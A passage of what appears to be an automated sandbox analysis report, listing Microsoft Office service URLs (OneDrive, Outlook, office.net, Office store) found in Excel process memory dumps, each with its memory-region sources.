    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: EXCEL.EXE, 00000000.00000003.503943037.000000000F805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.765237836.000000000F805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.757836026.000000000F805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576411439.000000000F805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.755273769.000000000F805000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: EXCEL.EXE, 00000000.00000003.503943037.000000000F805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.765237836.000000000F805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.757836026.000000000F805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576411439.000000000F805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.755273769.000000000F805000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
    Source: EXCEL.EXE, 00000000.00000003.503943037.000000000F805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.765237836.000000000F805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.757836026.000000000F805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576411439.000000000F805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.755273769.000000000F805000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://onedrive.live.com
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/embed?ia
    Source: EXCEL.EXE, 00000000.00000002.765033511.000000000F7B0000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com8
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://osi.office.net
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netK
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netst
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://otelrules.azureedge.net
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://otelrules.azureedge.netZ
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301259993.0000000013319000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://outlook.office.com
    Source: EXCEL.EXE, 00000000.00000003.755751851.000000000F8E2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576682242.000000000F8E2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.504342762.000000000F8E2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.765651167.000000000F8E2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301259993.0000000013319000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://outlook.office.com/
    Source: EXCEL.EXE, 00000000.00000003.756085438.000000000F935000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576719662.000000000F935000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.504427495.000000000F935000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301259993.0000000013319000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comB
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comiUrl
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comon
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301259993.0000000013319000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://outlook.office365.com
    Source: EXCEL.EXE, 00000000.00000003.755751851.000000000F8E2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576682242.000000000F8E2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.504342762.000000000F8E2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.765651167.000000000F8E2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301259993.0000000013319000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://outlook.office365.com/
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities2
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/ActivitiesMBI_SSL
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonSubstrateOfficeIntelligenceServicehttps:
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=OutlookMBI_SSL_SHORT
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlookn
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/review/query0
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/review/queryTemplateStarthttps://
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx$
